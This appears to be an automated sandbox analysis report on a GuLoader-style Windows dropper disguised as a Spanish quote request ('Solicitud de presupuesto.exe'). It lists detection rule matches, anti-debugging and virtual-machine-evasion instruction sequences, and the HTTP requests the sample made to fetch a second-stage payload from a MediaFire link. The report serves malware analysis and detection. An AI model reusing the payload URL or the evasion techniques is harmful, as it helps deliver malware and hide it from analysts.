Source: global traffic HTTP traffic detected: GET /file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: global traffic HTTP traffic detected: GET /error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.mediafire.comCache-Control: no-cacheConnection: Keep-AliveCookie: __cf_bm=4uvYBC02UOd1cKbNPKWfjyZIQa98JqObMjUYB7mrBPM-1679319383-0-ASF0LRFYZ3fzU8W96P06z5pnBdiTkJxi2AmhQl/AOfgCYtpuFMuAJ0hIMtzGtX1cqaWmzpG19QaXcnYy0YKMmuQ=
Source: unknown HTTPS traffic detected: 104.16.53.48:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.53.48:443 -> 192.168.2.5:49750 version: TLS 1.2

System Summary
barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Malicious sample detected (through community Yara rule)
Source: 00000000.00000000.307522232.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth (Nextron Systems)
Source: 00000001.00000000.403982899.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth (Nextron Systems)
Source: 00000000.00000002.404604650.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth (Nextron Systems)
Uses 32bit PE files
Source: Solicitud de presupuesto.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000000.307522232.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth (Nextron Systems), description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000000.403982899.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth (Nextron Systems), description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.404604650.000000000040D000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth (Nextron Systems), description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Sample file is different than original file name gathered from version info
Source: Solicitud de presupuesto.exe, 00000000.00000002.404843824.0000000000414000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHalvfemser.exe vs Solicitud de presupuesto.exe
Source: Solicitud de presupuesto.exe, 00000000.00000002.408124512.0000000002950000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHalvfemser.exeFE2XGabba vs Solicitud de presupuesto.exe
Source: Solicitud de presupuesto.exe, 00000001.00000000.404039539.0000000000414000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHalvfemser.exe vs Solicitud de presupuesto.exe
Source: Solicitud de presupuesto.exe Binary or memory string: OriginalFilenameHalvfemser.exe vs Solicitud de presupuesto.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005687B2 NtProtectVirtualMemory, 1_2_005687B2
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005604BE NtSetInformationThread, 1_2_005604BE
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005604BC NtSetInformationThread, 1_2_005604BC
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00560526 NtSetInformationThread, 1_2_00560526
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005605F0 NtSetInformationThread, 1_2_005605F0
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00560592 NtSetInformationThread, 1_2_00560592
Source: Solicitud de presupuesto.exe Virustotal: Detection: 78%
Source: Solicitud de presupuesto.exe ReversingLabs: Detection: 70%
Source: Solicitud de presupuesto.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Solicitud de presupuesto.exe C:\Users\user\Desktop\Solicitud de presupuesto.exe
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process created: C:\Users\user\Desktop\Solicitud de presupuesto.exe C:\Users\user\Desktop\Solicitud de presupuesto.exe
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process created: C:\Users\user\Desktop\Solicitud de presupuesto.exe C:\Users\user\Desktop\Solicitud de presupuesto.exe Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@3/0@1/1
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.575875706.0000000000560000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Solicitud de presupuesto.exe PID: 1352, type: MEMORYSTR
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: Solicitud de presupuesto.exe PID: 1352, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00566396 push ecx; ret 1_2_005663E0
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe RDTSC instruction interceptor: First address: 00000000028B755F second address: 00000000028B757D instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007FD4AD1AA552h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe RDTSC instruction interceptor: First address: 00000000028B757D second address: 00000000028B755F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007FD4ACB61440h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007FD4ACB61463h 0x0000001b push ecx 0x0000001c call 00007FD4ACB614D2h 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe RDTSC instruction interceptor: First address: 000000000056755F second address: 000000000056757D instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c pushad 0x0000000d mov eax, 00000001h 0x00000012 cpuid 0x00000014 bt ecx, 1Fh 0x00000018 jc 00007FD4AD1AA552h 0x0000001a popad 0x0000001b lfence 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe RDTSC instruction interceptor: First address: 000000000056757D second address: 000000000056755F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007FD4ACB61440h 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007FD4ACB61463h 0x0000001b push ecx 0x0000001c call 00007FD4ACB614D2h 0x00000021 lfence 0x00000024 rdtsc
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_0056755C 1_2_0056755C
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe TID: 1252 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe TID: 1252 Thread sleep time: -450000s >= -30000s Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe File opened / queried: C:\ProgramData\qemu-ga\qga.state Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_0056755C rdtsc 1_2_0056755C
Source: Solicitud de presupuesto.exe, 00000001.00000002.575875706.0000000000560000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: C:\ProgramData\qemu-ga\qga.state

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Thread information set: HideFromDebugger Jump to behavior
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005604BE NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000 1_2_005604BE
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00566853 mov eax, dword ptr fs:[00000030h] 1_2_00566853
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_005638F9 mov eax, dword ptr fs:[00000030h] 1_2_005638F9
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00562647 mov eax, dword ptr fs:[00000030h] 1_2_00562647
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00561A3A mov eax, dword ptr fs:[00000030h] 1_2_00561A3A
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00562629 mov eax, dword ptr fs:[00000030h] 1_2_00562629
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567EF2 mov eax, dword ptr fs:[00000030h] 1_2_00567EF2
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567EFC mov eax, dword ptr fs:[00000030h] 1_2_00567EFC
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567F46 mov eax, dword ptr fs:[00000030h] 1_2_00567F46
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567362 mov eax, dword ptr fs:[00000030h] 1_2_00567362
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_00567F96 mov eax, dword ptr fs:[00000030h] 1_2_00567F96
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Code function: 1_2_0056755C rdtsc 1_2_0056755C
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Solicitud de presupuesto.exe Process created: C:\Users\user\Desktop\Solicitud de presupuesto.exe C:\Users\user\Desktop\Solicitud de presupuesto.exe Jump to behavior

Stealing of Sensitive Information
barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 830606 Sample: Solicitud de presupuesto.exe Startdate: 20/03/2023 Architecture: WINDOWS Score: 100 15 Potential malicious icon found 2->15 17 Malicious sample detected (through community Yara rule) 2->17 19 Antivirus / Scanner detection for submitted sample 2->19 21 9 other signatures 2->21 6 Solicitud de presupuesto.exe 2->6         started        process3 signatures4 23 Hides threads from debuggers 6->23 9 Solicitud de presupuesto.exe 6 6->9         started        process5 dnsIp6 13 www.mediafire.com 104.16.53.48, 443, 49696, 49697 CLOUDFLARENETUS United States 9->13 25 Hides threads from debuggers 9->25 signatures7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.16.53.48
 www.mediafire.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
www.mediafire.com 104.16.53.48 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.mediafire.com/error.php?errno=386&quickkey=9yrjccjdow659ow&origin=download false
    		high
    https://www.mediafire.com/file/9yrjccjdow659ow/sala_ziPUQPqut175.bin/file false
      		high